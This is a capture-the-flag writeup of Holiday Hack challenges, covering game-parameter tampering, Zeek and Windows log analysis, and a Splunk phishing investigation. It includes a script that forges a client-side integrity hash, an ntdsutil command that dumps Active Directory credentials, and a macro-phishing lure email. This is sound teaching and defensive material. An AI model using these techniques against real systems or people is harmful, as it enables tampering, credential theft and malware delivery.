[rand0macc3ss]$ echo "5 + 2 + 10 + 5 + 20 + 1295" | bc
1337
[rand0macc3ss]$ /bin/echo -n "1337" | md5sum
e48e13207341b6bffb7fb1622282247b  -

By calculating the correct hash, it is possible to manipulate the parameters as you please and beat the game. We found a way to get an even higher score, since the number of days before Christmas is factored into the final score. Setting curday to 25 and curmonth to 12 (Christmas Day) means that, because the game increments curday by 1, it reports that you completed the game 364 days before Christmas. Combining that with the maximum parameter values we found earlier gives an even higher final score, as shown in the following screencap.

_images/maxhardfin.png
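The re-signing step as an added example (not code from the original writeup or from the game): given a captured POST body, change whatever fields you like and recompute the hash from the nine summed fields exactly as described above, with no trailing newline. The sample body is constructed, not a real capture, and the field list is the one the writeup reverse-engineered.

```python
import hashlib
from urllib.parse import parse_qs, urlencode

# Fields the writeup found to be summed into the hash on hard difficulty.
HASHED_FIELDS = ("reindeer", "runners", "money", "distance",
                 "curmonth", "curday", "food", "ammo", "meds")

# Constructed sample body (not a real capture); its hashed fields sum to 1337.
SAMPLE_BODY = ("difficulty=2&distance=300&money=1000&pace=0&curmonth=9&curday=1"
               "&reindeer=2&runners=2&ammo=10&meds=3&food=10&name0=Chloe&hash=deadbeef")


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def trail_hash(params):
    """MD5 of the decimal sum of the nine fields, with no trailing newline (cf. echo -n)."""
    total = sum(int(params[k]) for k in HASHED_FIELDS)
    return hashlib.md5(str(total).encode("ascii")).hexdigest()


def resign(body, **overrides):
    """Take a captured POST body, change fields, recompute the hash, and re-encode.

    Everything the server checks is derived from values the client sends, so this
    'integrity' check only stops people who have not read the JavaScript."""
    params = parse_body(body)
    params.update({k: str(v) for k, v in overrides.items()})
    params["hash"] = trail_hash(params)
    return urlencode(params)


if __name__ == "__main__":
    print("original sum hash :", trail_hash(parse_body(SAMPLE_BODY)))
    print("re-signed body    :", resign(SAMPLE_BODY, distance=8000, money=6000,
                                        curmonth=12, curday=25))
```

A server-side fix would be an HMAC over the parameters with a key the client never sees, or simply keeping the game state on the server; a hash the client can recompute is not an integrity control.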

But that isn’t the last thing to find in this challenge. Earlier in game, a certain elf tells you that if you complete Holiday Hack Trail on hard, there will be a special hint on the last page. By viewing the source of the page, you can find an additional comment tag with some handy tips for completing the Sleigh Workshop Door challenge.

_images/hard_hidden_hint.png

Zeek JSON Analysis

Goal

Find the IP Address with the longest connection in the Zeek logfile.

Location

Sleigh Shop

Dialog

Wunorse Openslae


Before Solving


After Solving

That's got to be the one - thanks!
Hey, you know what? We've got a crisis here.
You see, Santa's flight route is planned by a complex set of machine learning algorithms which use available weather data.
All the weather stations are reporting severe weather to Santa's Sleigh. I think someone might be forging intentionally false weather data!
I'm so flummoxed I can't even remember how to login!
Hmm... Maybe the Zeek http.log could help us.
I worry about LFI, XSS, and SQLi in the Zeek log - oh my!
And I'd be shocked if there weren't some shell stuff in there too.
I'll bet if you pick through, you can find some naughty data from naughty hosts and block it in the firewall.
If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs.
The sleigh's machine learning device (SRF) needs most of the malicious IPs blocked in order to calculate a good route.
Try not to block many legitimate weather station IPs as that could also cause route calculation failure.
Remember, when looking at JSON data, jq is the tool for you!

Solution

Hint

Jq

Answer

jq -rs '. | max_by(.duration) | ."id.resp_h"' conn.log

Explanation

We can use jq to parse the Zeek file. Since we're looking for the IP with the longest connection, we use jq's max_by function to find the entry with the highest .duration and print its responder address. The -s flag slurps every line of the file into one array so that max_by sees all entries at once, and -r prints the address without quotes.

Once we have the ip address, we just need to run runtoanswer to get credit.
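The same lookup in Python, as an added example that is not part of the original writeup: it reads JSON-format conn.log lines, ignores entries that have no duration (Zeek omits the field for connections it never saw complete, which jq's max_by would silently rank lowest), and also totals duration per responder, which is a handy second view when one host has many shorter connections. The four log lines are constructed, not taken from the challenge's conn.log.

```python
import json

# Constructed Zeek conn.log lines in JSON format (not the challenge's data).
# The third entry has no duration, as Zeek writes for connections it never saw finish.
CONN_LOG = """
{"ts":1574000000.1,"uid":"CA1","id.orig_h":"10.0.0.5","id.resp_h":"13.107.21.200","id.resp_p":443,"proto":"tcp","duration":12.5}
{"ts":1574000001.2,"uid":"CA2","id.orig_h":"10.0.0.5","id.resp_h":"192.0.2.44","id.resp_p":4444,"proto":"tcp","duration":31536.9}
{"ts":1574000002.3,"uid":"CA3","id.orig_h":"10.0.0.7","id.resp_h":"192.0.2.44","id.resp_p":4444,"proto":"tcp"}
{"ts":1574000003.4,"uid":"CA4","id.orig_h":"10.0.0.9","id.resp_h":"198.51.100.8","id.resp_p":53,"proto":"udp","duration":0.002}
{"ts":1574000004.5,"uid":"CA5","id.orig_h":"10.0.0.9","id.resp_h":"13.107.21.200","id.resp_p":443,"proto":"tcp","duration":40.0}
"""


def read_conn_log(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def longest_connection(conns):
    """The conn record with the largest duration; records without one are skipped."""
    timed = [c for c in conns if isinstance(c.get("duration"), (int, float))]
    if not timed:
        return None
    return max(timed, key=lambda c: c["duration"])


def total_duration_by_resp(conns):
    """Total connection time per responder, largest first."""
    totals = {}
    for c in conns:
        totals[c["id.resp_h"]] = totals.get(c["id.resp_h"], 0.0) + (c.get("duration") or 0.0)
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)


if __name__ == "__main__":
    conns = read_conn_log(CONN_LOG)
    top = longest_connection(conns)
    print("longest:", top["id.resp_h"], top["duration"], "s (uid", top["uid"] + ")")
    for host, total in total_duration_by_resp(conns):
        print(f"{host:16} {total:10.3f}")
```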

Objectives

0) Talk to Santa in the Quad

Goal

Enter the campus quad and talk to Santa.

Location

The Quad

Dialog

_images/santa_quad.png
This is a little embarrassing, but I need your help.
Our KringleCon turtle dove mascots are missing!
They probably just wandered off.
Can you please help find them?
To help you search for them and get acquainted with KringleCon, I’ve created some objectives for you. You can see them in your badge.
Where's your badge? Oh! It's that big, circle emblem on your chest - give it a tap!
We made them in two flavors - one for our new guests, and one for those who've attended both KringleCons.
After you find the Turtle Doves and complete objectives 2-5, please come back and let me know.
Not sure where to start? Try hopping around campus and talking to some elves.
If you help my elves with some quicker problems, they'll probably remember clues for the objectives.

Solution

Leave the train station (where you start) and talk to Santa.

1) Find the Turtle Doves

Goal

Find the missing turtle doves.

Location

Student Union

Dialog

_images/doves.png
Hoot Hooot?

Solution

You can find the doves in the Student Union next to the fireplace.

2) Unredact Threatening Document

Goal

Someone sent a threatening letter to Elf University. What is the first word in ALL CAPS in the subject line of the letter? Please find the letter in the Quad.

Location

The Quad

Solution

Answer

DEMAND

Date: February 28, 2019

To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole

From: A Concerned and Aggrieved Character

Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR
ELSE!


Attention All Elf University Personnel,

It remains a constant source of frustration that Elf University and the entire operation at the
North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE
you to consider lending your considerable resources and expertise in providing merriment,
cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical
characters.

For centuries, we have expressed our frustration at your lack of willingness to spread your
cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine
holidays and mythical characters that need your direct support year-round.

If you do not accede to our demands, we will be forced to take matters into our own hands.
We do not make this threat lightly. You have less than six months to act demonstrably.

Sincerely,

--A Concerned and Aggrieved Character

Explanation

The letter can be found in the northwest corner of The Quad. The redaction only covers the text visually; the underlying text is still selectable, so after opening the document, simply highlight the text and paste it into your favourite text editor.

Optionally, you could run pdftotext to achieve the same result.

3) Windows Log Analysis: Evaluate Attack Outcome

Goal

We’re seeing attacks against the Elf U domain! Using the event log data, identify the user account that the attacker compromised using a password spray attack. Bushy Evergreen is hanging out in the train station and may be able to help you out.

Solution

Answer

supatree

Explanation

A password spray attack is similar to a brute-force attack, except that rather than trying many passwords against a few users, you try a few passwords against many users. This keeps each account under the lockout threshold, but it is still very noisy if anyone is paying attention: it generates a spike of 4625 (Failed Logon) events across many different accounts from the same source.

For this challenge we're told the attack was successful, which means a 4624 (Successful Logon) event from the spraying source should follow the failures. On Windows, we can use DeepBlueCLI to parse the event log and show us the password spray and the successful logon.

Alternatively, on Linux we can use the python-evtx project's scripts to dump the data.
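Written out as plain Python over constructed Security-log records, as an added example that is neither DeepBlueCLI's logic nor part of the original writeup: a spray shows up as one source address failing against many distinct accounts, and the compromise as a 4624 from that same source after its failures began. A single user fat-fingering their own password is included to show what the distinct-user threshold filters out. The SubStatus filter (0xC000006A is "wrong password") and the user names are assumptions for the sample.

```python
from collections import defaultdict

# Constructed Security-log records (not the challenge's data).
# 4625 = failed logon, 4624 = successful logon; SubStatus 0xC000006A = wrong password.
LOGONS = [
    # One source, twelve different accounts, one guess each: a spray.
    *[{"ts": f"2019-11-19T09:00:{i:02d}Z", "EventID": 4625, "TargetUserName": f"elf{i:02d}",
       "IpAddress": "192.168.57.200", "LogonType": 3, "SubStatus": "0xC000006A"}
      for i in range(12)],
    {"ts": "2019-11-19T09:00:12Z", "EventID": 4624, "TargetUserName": "supatree",
     "IpAddress": "192.168.57.200", "LogonType": 3},
    # One user mistyping their own password twice, then getting in: noisy, not a spray.
    {"ts": "2019-11-19T09:05:00Z", "EventID": 4625, "TargetUserName": "minty",
     "IpAddress": "192.168.57.15", "LogonType": 2, "SubStatus": "0xC000006A"},
    {"ts": "2019-11-19T09:05:05Z", "EventID": 4625, "TargetUserName": "minty",
     "IpAddress": "192.168.57.15", "LogonType": 2, "SubStatus": "0xC000006A"},
    {"ts": "2019-11-19T09:05:30Z", "EventID": 4624, "TargetUserName": "minty",
     "IpAddress": "192.168.57.15", "LogonType": 2},
]


def spray_sources(events, min_distinct_users=5):
    """Source addresses whose wrong-password failures hit many *different* accounts."""
    users_per_ip = defaultdict(set)
    for e in events:
        if e["EventID"] == 4625 and e.get("SubStatus") == "0xC000006A":
            users_per_ip[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: sorted(users) for ip, users in users_per_ip.items()
            if len(users) >= min_distinct_users}


def compromised_accounts(events, min_distinct_users=5):
    """Accounts that logged on successfully from a spraying source after its spray began."""
    sprayers = spray_sources(events, min_distinct_users)
    first_fail = {}
    for e in events:
        if e["EventID"] == 4625 and e["IpAddress"] in sprayers:
            first_fail[e["IpAddress"]] = min(first_fail.get(e["IpAddress"], e["ts"]), e["ts"])
    return [(e["TargetUserName"], e["IpAddress"], e["ts"])
            for e in sorted(events, key=lambda e: e["ts"])
            if e["EventID"] == 4624 and e["IpAddress"] in sprayers
            and e["ts"] > first_fail[e["IpAddress"]]]


if __name__ == "__main__":
    for ip, users in spray_sources(LOGONS).items():
        print(f"spray from {ip}: {len(users)} accounts tried")
    for user, ip, ts in compromised_accounts(LOGONS):
        print(f"compromised: {user} from {ip} at {ts}")
```

Counting distinct target accounts per source, rather than raw failure counts, is what separates a spray from an ordinary burst of typos; in real data you would also bound the window in time and treat 0xC0000064 (no such user) failures separately, since sprays against an unknown user list produce those instead.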

4) Windows Log Analysis: Determine Attacker Technique

Goal

Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary.

Solution

Answer

ntdsutil

Explanation

Using process of elimination, we can filter out the process names we know we're not looking for until ntdsutil stands out.

cat sysmon-data.json | jq '.[] | select(.event_type=="process") | select(.process_name!="wevtutil.exe") | select(.process_name!="net.exe")' | less

ntdsutil.exe is the built-in tool for managing the Active Directory database (ntds.dit). The "ifm create full" command seen in the log writes a complete copy of that database, password hashes included, to disk, which is a well-known offline credential-theft technique; if you ever see ntdsutil run with ifm outside of a planned domain-controller build, you should check it out.

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753343(v=ws.11)

https://adsecurity.org/?p=2398

https://www.carbonblack.com/cbfeeds/cbcommunity_feed.xhtml#4

Alternatively, we could use eql to query the event logs. From the hint, we get this search to look for important ntdsutil events.

eql query -f sysmon-data.json 'process where process_name == "ntdsutil.exe" and command_line == "*create*" and command_line == "*ifm*"' | jq

{
  "command_line": "ntdsutil.exe  \"ac i ntds\" ifm \"create full c:\\hive\" q q",
  "event_type": "process",
  "logon_id": 999,
  "parent_process_name": "cmd.exe",
  "parent_process_path": "C:\\Windows\\System32\\cmd.exe",
  "pid": 3556,
  "ppid": 3440,
  "process_name": "ntdsutil.exe",
  "process_path": "C:\\Windows\\System32\\ntdsutil.exe",
  "subtype": "create",
  "timestamp": 132186398470300000,
  "unique_pid": "{7431d376-dee7-5dd3-0000-0010f0c44f00}",
  "unique_ppid": "{7431d376-dedb-5dd3-0000-001027be4f00}",
  "user": "NT AUTHORITY\\SYSTEM",
  "user_domain": "NT AUTHORITY",
  "user_name": "SYSTEM"
}

5) Network Log Analysis: Determine Compromised System

Goal

The attacks don’t stop! Can you help identify the IP address of the malware-infected system using these Zeek logs? For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry.

Solution

Hint

Answer

192.168.134.130

Explanation

Despite the 1.5 GB of logs, this one is pretty simple. In your web browser, open the index.html located in <unzip dir>/ELFU/ELFU, select the ELFU database, and go to the "beacons" tab at the top. The first entry, with the highest number of beacons, is coming from 192.168.134.130.

6) Splunk

Goal

Access https://splunk.elfu.org/ as elf with password elfsocks. What was the message for Kent that the adversary embedded in this attack? The SOC folks at that link will help you along! For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.

Dialog

Professor Banas


Before Solving

Hi, I'm Dr. Banas, professor of Cheerology at Elf University.
This term, I'm teaching "HOL 404: The Search for Holiday Cheer in Popular Culture," and I've had quite a shock!
I was at home enjoying a nice cup of Gløgg when I had a call from Kent, one of my students who interns at the Elf U SOC.
Kent said that my computer has been hacking other computers on campus and that I needed to fix it ASAP!
If I don't, he will have to report the incident to the boss of the SOC.
Apparently, I can find out more information from this website https://splunk.elfu.org/ with the username: elf / Password: elfsocks.
I don't know anything about computer security. Can you please help me?
After Solving

Oh, thanks so much for your help! Sorry I was freaking out.
I've got to talk to Kent about using my email again...
...and picking up my dry cleaning.

Solution

Answer

Kent you are so unfair. And we were going to make you the king of the Winter Carnival.

Explanation

1. What is the short host name of Professor Banas’ computer?

This can be found in the chat log on the main splunk page, under “#ELF SOC”.

Answer

sweetums

2. What is the name of the sensitive file that was likely accessed and copied by the attacker?

Please provide the fully qualified location of the file. (Example: C:\temp\report.pdf)

This can be found by looking for “Documents”.

Answer

C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt

3. What is the fully-qualified domain name(FQDN) of the command and control(C2) server?

Answer

144.202.46.214.vultr.com

4. What document is involved with launching the malicious PowerShell code?

Please provide just the filename. (Example: results.txt)

Looking through the stoQ logs, we can extract all of the filenames. Knowing common attack vectors for PowerShell, we can look for .docm files, which are macro-enabled Word documents.

sourcetype=stoq
| top limit=200 "results{}.payload_meta.extra_data.filename"

Answer

19th century holiday cheer assignment.docm

5. How many unique email addresses were used to send Holiday Cheer essays to Professor Banas?

Please provide the numeric value. (Example: 1)

This search gets all emails with a subject containing “assignment”, excluding any from Carl Banas. We then rename the from field, because eval doesn’t like field names with special characters. eval lowercases the from field so that differently-cased copies of the same address count as one. Lastly, stats counts how many distinct “from” addresses we have.

sourcetype=stoq "results{}.workers.smtp.subject"="*assignment*" AND results{}.workers.smtp.from!="*carl banas*"
| rename results{}.workers.smtp.from as from
| eval from=lower(from)
| stats count by from

Answer

21

6. What was the password for the zip archive that contained the suspicious file?

"19th century holiday cheer assignment.docm" zip password

Answer

123456789

7. What email address did the suspicious file come from?

Same search as 6.

Challenge

If we click into the directory structure until we come to a file, we can use the base URL to grab the XML listing for the bucket:

wget http://elfu-soc.s3-website-us-east-1.amazonaws.com

With that file, we can loop through all the “Key” values and copy all files to our local machine

grep -Po '<Key>\K.*?(?=</Key>)' ../index.html | while read -r i; do wget "http://elfu-soc.s3-website-us-east-1.amazonaws.com/$i"; done

If we read the “c6e175f5b8048c771b3a3fac5f3295d2032524af” file, which was the “19th century holiday cheer assignment.docm”, we get a hint:

Hint

Cleaned for your safety. Happy Holidays!

In the real world, this would have been a wonderful artifact for you to investigate, but it had malware in it of course so it’s not posted here. Fear not! The core.xml file that was a component of this original macro-enabled Word doc is still in this File Archive thanks to stoQ. Find it and you will be a happy elf :-)

Navigating everything with file hashes for names is kind of a pain, so let’s fix that.
In Splunk, we can get a mapping of all of the filenames to hash names like this.

sourcetype=stoq
| eval results = spath(_raw, "results{}")
| mvexpand results
| eval path=spath(results, "archivers.filedir.path"), filename=spath(results, "payload_meta.extra_data.filename"), hash=mvindex(split(path, "/"), -1)
| where filename!="" AND hash!=""
| table filename hash

The first eval pulls out the “results” values and places them in results. Since this field has multiple values, and we want them all, we use mvexpand to separate the values of results into their own events. The second eval pulls the filename and the archive path out of the JSON structure and takes the hash from the last component of that path. where makes sure that every row we keep contains both a filename and a file hash. Finally, we put the filename and hash into a table. At this point we can export our results to a CSV.

We should manually edit the CSV file and remove the header and quotes.

while IFS=, read -r name hash; do find . -name "$hash" -exec mv --backup=numbered '{}' "$name" \; ; done < ../filenames.csv

For each hash in our mapping, find the file named as that hash, and move it to the correct filename. (The original one-liner lacked the \; that terminates find’s -exec, so find refused to run; reading the CSV with read also keeps filenames containing spaces intact.)
It’s important to have --backup=numbered in the mv command so we don’t overwrite files with the same name.
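As an added example that is not part of this writeup, the two searches above (the unique-sender count from question 5 and the filename-to-hash mapping) replayed in Python over a constructed stoQ-shaped sample, followed by the numbered-backup rename step. The sample events, addresses and hash values are assumptions made for the example; the field paths are the ones the searches use.

```python
"""Offline replay of two of the Splunk searches above over a constructed stoQ-shaped
sample.  A stoQ event is JSON whose "results" array holds one entry per extracted
payload: the SMTP message (workers.smtp.*), then each attachment and each member
unpacked from it (payload_meta.extra_data.filename, archivers.filedir.path).
Events, addresses and hash values here are constructed for the example."""
import os
import shutil
import tempfile
from collections import Counter

SUBJECT = "Holiday Cheer Assignment Submission"

def mail(sender, subject=SUBJECT):
    return {"workers": {"smtp": {"from": sender, "subject": subject}}}

def payload(filename, hash_=None):
    entry = {"payload_meta": {"extra_data": {"filename": filename}}}
    if hash_:  # real archive paths end in the payload's hash; these are made up
        entry["archivers"] = {"filedir": {"path": f"/home/ubuntu/archive/{hash_}"}}
    return entry

SAMPLE_EVENTS = [
    {"results": [mail("Bushy Evergren <Bushy.Evergren@students.elfu.org>"),
                 payload("evergreen_essay.docx", "hash-a1"),
                 payload("core.xml", "hash-c1"),
                 payload("image1.jpg")]},  # extracted, but never written to disk
    {"results": [mail("BUSHY EVERGREN <Bushy.Evergren@students.elfu.org>",
                      "Re: assignment")]},  # same sender, different case
    {"results": [mail("Carl Banas <Carl.Banas@faculty.elfu.org>", "RE: " + SUBJECT)]},
    {"results": [mail("Brownie Snowtrifle <Brownie.Snowtrifle@students.elfu.org>"),
                 payload("Snowtrifle_HOL404_assignment.docx", "hash-s1"),
                 payload("core.xml", "hash-c2")]},  # a second core.xml: name collision
]

def spath(obj, dotted, default=None):
    """Walk a dotted field path through nested dicts, like Splunk's spath()."""
    for part in dotted.split("."):
        if not isinstance(obj, dict) or part not in obj:
            return default
        obj = obj[part]
    return obj

def expanded(events):
    """mvexpand results: yield every results{} entry as a row of its own."""
    for event in events:
        yield from event.get("results", [])

def unique_senders(events, subject_contains="assignment", exclude="carl banas"):
    """Question 5: distinct senders of assignment mail, minus the professor's own
    replies.  Splunk matches *assignment* and *carl banas* case-insensitively and
    eval from=lower(from) folds case before stats counts, so we lower() too."""
    counts = Counter()
    for row in expanded(events):
        sender, subject = spath(row, "workers.smtp.from"), spath(row, "workers.smtp.subject")
        if sender is None or subject is None:
            continue
        if subject_contains not in subject.lower() or exclude in sender.lower():
            continue
        counts[sender.lower()] += 1
    return counts

def filename_hash_map(events):
    """The mapping search: (filename, hash) for every payload that has both a
    stoQ filename and an archive path; the hash is the last path component."""
    rows = []
    for row in expanded(events):
        filename = spath(row, "payload_meta.extra_data.filename", "")
        hash_ = spath(row, "archivers.filedir.path", "").rsplit("/", 1)[-1]
        if filename and hash_:  # where filename!="" AND hash!=""
            rows.append((filename, hash_))
    return rows

def rename_by_hash(directory, rows):
    """Give each hash-named file its original name.  If that name is taken, the
    existing file is first moved aside as name.~N~, which is what mv
    --backup=numbered does and why all the core.xml members survive."""
    for filename, hash_ in rows:
        src, dst = os.path.join(directory, hash_), os.path.join(directory, filename)
        if not os.path.isfile(src):
            continue
        if os.path.exists(dst):
            n = 1
            while os.path.exists(f"{dst}.~{n}~"):
                n += 1
            shutil.move(dst, f"{dst}.~{n}~")
        shutil.move(src, dst)

def demo():
    """Create the hash-named files in a scratch directory, apply the mapping and
    return the resulting listing; the directory is removed afterwards."""
    rows = filename_hash_map(SAMPLE_EVENTS)
    workdir = tempfile.mkdtemp()
    try:
        for _, hash_ in rows:
            open(os.path.join(workdir, hash_), "w").close()
        rename_by_hash(workdir, rows)
        return sorted(os.listdir(workdir))
    finally:
        shutil.rmtree(workdir)
```

Running demo() yields the four renamed files with the colliding core.xml kept as core.xml.~1~, the same shape as the real listing after the mv loop.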

After doing this, we can see the core.xml file from the hint

cat \"core.xml*
grep Kent \"core*

Kent you are so unfair. And we were going to make you the king of the Winter Carnival.

Misc

There are other interesting files that we’ve pulled down from stoQ.

Word Docs

adventures.docx

_images/adventures.jpg

Antiochus_Epipanes.docx

_images/antiochus_epipanes.jpg

Carolers.docx

_images/carolers.jpg

children.docx

_images/children.jpg

evergreen_essay.docx

_images/evergreen_essay.jpg

Frank.docx

_images/frank.jpg

holiday_inn.docx

_images/holiday_inn.jpg

ivytraditions.docx

_images/ivytraditions.jpg

lights_of_cheer.docx

_images/lights_of_cheer.jpg

nightbefore.docx

_images/nightbefore.jpg

nutcracker.docx

_images/nutcracker.jpg

oh_henry.docx

_images/oh_henry.jpg

Rudolph.docx

_images/rudolph.jpg

Silver.docx

_images/silver.jpg

Snowtrifle_HOL404_assignment.docx

_images/snowtrifle.jpg

stonehenge.docx

_images/stonehenge.jpg

Sugartree_HOL404_assignment.docx

_images/sugartree.jpg

The Bells of St Marys.docx

_images/the_bells.jpg

village+people.docx

_images/village_people.jpg
Emails

To Carl Banas From Brownie Snowtrifle

Hey Prof! Here's my holiday cheer essay!
To Carl Banas From Bushy Evergren

Hi Professor Banas!
My essay is attached.

Happy Holidays!
Bushy Evergren
To Carl Banas From Carol Greenballs

I know what you're thinking. That Carol. She's gonna write up her essay on caroling. HOW BORING. Well look, I'm sick of people making fun of my name. It refers to joyous holiday songs. Problem is, people sometimes hear it as "carrel" which refers to a small cubicle with a desk, for the use of a reader, or a student, in a library. Well guess where I am? Right now? I'm Carol, in a carrel, in the library, sending you my essay on caroling, not on carreling, which is what I'm doing right now, but what I won't be doing on christmas eve, when I'll be caroling.

Get it?

Thank you, professor banas!
To Carl Banas From Cherry Brandyfluff

Alright professor, here is my paper....

My break will be spent in a town where everyday is silent and grey.  If you have any questions about my paper, I will be hiding on the promenade, etching a postcard with my favorite bottle of my namesake De Kuyper liquor and some marshmallow...

-Cherry
To Carl Banas From Clove Fruitsparkles

Hi Carl,

It's ok if I call you Carl, right? Anyhoo, here's my essay!
To Carl Banas From Cupcake Silverlog

Professor.

You know what I hate! I hate those newfangled LED christmas lights. Give me incandescent all the way, baby! I don't care if you can buy them at a big-box store for a pittance, I want the real thing. That's why I wrote my essay on the Lights of Cheer. Enjoy, and I'll see you after the break!

Cupcake
To Carl Banas From Holly Evergreen

Hi Prof;

Thanks for the great assignment!

See you after the break,
Holly Evergreen
To Carl Banas From Merry Fairybubbles

I am so in the holiday spirit right now with this paper being complete! My glass of champagne is bubbling over...

Thanks!
MF
To Carl Banas From Minty Candycane

Hi Professor;

Finally done. Please confirm that you received this in time.

Thank you,
Minty Candycane
To Carl Banas From Partridge Sugartree

Essay attached.
To Carl Banas From Pepper Minstix

Dr Banas;

That assignment was really tough! Can I drop the grade on this one?

Thanks,
Pepper Minstix
To Carl Banas From Plum Sparklepie

Dear Professor,

Please see attached my submission for the holiday cheer assignment. Do you think there is a chance I can still pass this class?
To Carl Banas From Robin Wintercrystals

Professor!

Here is my submission before I head out for winter break...

This paper really crystalized for me at the last minute...

-RWC
To Carl Banas From Shinny Upatree

Hey Prof Banas;

Hope I did better this time!

Happy Holidays
Shinny Upatree
To Carl Banas From Sixpence Snowcane

Professor,

This assignment was quite an adventure. See you in class!
To Carl Banas From Sparkle Redberry

I hope you enjoy the holidays, here is my paper!

Perhaps in springtime, we can go for an outing. I can meet you at the cemetary gates and we go inside and we gravely read the stones. All those people, all those lives, where are they now? With loves, and hates and passions just like mine, they were born and then they lived and then they died. It seems so unfair I want to cry...

Sorry just getting a little melancholy...I will be back to my Sparkly-self soon!

-Sparkle
To Carl Banas From SugerPlum Mary

Hi professor. So sorry, I'm sick today. I might have typhoid. I'm just here listening to a high fidelity stream of jethro tull - my favorite tune is "cross-eyed mary." But I digress! I hope my essay isn't late, here it is.

(Sugerplum) Mary
To Carl Banas From Turtledove Fairytree

You know Dasher and Dancer and Prancer and Vixen
Comet and Cupid and Donner and Blitzen
But do you recall
The most famous reindeer of all?
Rudolph the Red-Nosed Reindeer
Had a very shiny nose
And if you ever saw it
You would even say it glows
All of the other reindeer
Used to laugh and call him names
They never let poor Rudolph
Join in any reindeer games
Then one foggy Christmas Eve
Santa came to say
"Rudolph, with your nose so bright
Won't you guide my sleigh tonight?"
Then how the reindeer loved him
As they shouted out with glee
"Rudolph the Red-Nosed Reindeer
You'll go down in history"
Rudolph the Red-Nosed Reindeer
Had a very shiny nose
And if you ever saw it
You would even say it glows
All of the other reindeer
Used to laugh and call him names
They never let poor Rudolph
Join in any reindeer games
Then one foggy Christmas Eve
Santa came to say
"Rudolph, with your nose so bright
Won't you guide my sleigh tonight?"
Then how the reindeer loved him
As they shouted out with glee
"Rudolph the Red-Nosed Reindeer
You'll go down in history"

NEVER. GETS. OLD.

Best essay ever, prof banas!

T. Fairytree
To Carl Banas From Wunorse Openslae

Hey prof. It's cold here in Oslo but sending you my assignment warms my heart. Merry Christmas, kind sir.

Wunose
To Carl Banas From Yule Toffeetoes

Sorry this is so late professor! Hope you enjoy my paper!

Have a cool Yule!

😉

-Yule
To Carl Banas From Bradly Buttercups

Professor Banas, I have completed my assignment. Please open the attached zip file with password 123456789 and then open the word document to view it. You will have to click "Enable Editing" then "Enable Content" to see it. This was a fun assignment. I hope you like it!  --Bradly Buttercups
To Bradly Buttercups From Carl Banas

Bradly,

I opened your assignment (which was not easy, by the way) and it seems you have not only not included an image per the instructions, but your assignment is identical to another student's assignment.  This means your grade will be 0/100.

-csb

From: Bradly Buttercups <Bradly.Buttercups@eIfu.org>
Sent: Thursday, November 21, 2019 9:18 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission


Professor Banas, I have completed my assignment. Please open the attached zip file with password 123456789 and then open the word document to view it. You will have to click "Enable Editing" then "Enable Content" to see it. This was a fun assignment. I hope you like it!  --Bradly Buttercups
To Brownie Snowtrifle From Carl Banas

Brownie,

Excellent work!  I love the abominable snowman.  Well done.

100/100

-Prof Banas

From: Brownie Snowtrifle <Brownie.Snowtrifle@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:44 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Hey Prof! Here's my holiday cheer essay!
To Bushy Evergren From Carl Banas

Bushy,

I have some plagiarism concerns with your submission.  Please make a follow up appointment during my office hours for us to discuss your academic integrity.  Until that time, your grade will be 50/100.

csb

From: Bushy Evergren <Bushy.Evergren@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:46 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Hi Professor Banas!

My essay is attached.

Happy Holidays!
Bushy Evergren
To Carol Greenballs From Carl Banas

Carol,

Great work on your essay!  I like that you did it on your name and it makes sense. I got a kick out of your puns.

100/100
csb

From: Carol Greenballs <Carol.Greenballs@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 9:14 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

I know what you're thinking. That Carol. She's gonna write up her essay on caroling. HOW BORING. Well look, I'm sick of people making fun of my name. It refers to joyous holiday songs. Problem is, people sometimes hear it as "carrel" which refers to a small cubicle with a desk, for the use of a reader, or a student, in a library. Well guess where I am? Right now? I'm Carol, in a carrel, in the library, sending you my essay on caroling, not on carreling, which is what I'm doing right now, but what I won't be doing on christmas eve, when I'll be caroling.

Get it?

Thank you, professor banas!
To Cherry Brandyfluff From Carl Banas

Cherry,

Nice job, although I'm not sure that was the best image.

95/100

csb

From: Cherry Brandyfluff <Cherry.Brandyfluff@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:59 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Alright professor, here is my paper....

My break will be spent in a town where everyday is silent and grey.  If you have any questions about my paper, I will be hiding on the promenade, etching a postcard with my favorite bottle of my namesake De Kuyper liquor and some marshmallow...

-Cherry
To Clove Fruitsparkles From Carl Banas

Clove,
No, I prefer Professor Banas.  Thank you for submitting your assignment.
80/100

csb

From: Clove Fruitsparkles <Clove.Fruitsparkles@students.elfu.org>
Sent: Thursday, Sun, 25 Augember 21, 2019 8:55 AM
To: Carl Banas <Carl.Banas@faculty.elfu.org>
Subject: Holiday Cheer Assignment Submission

Hi Carl,

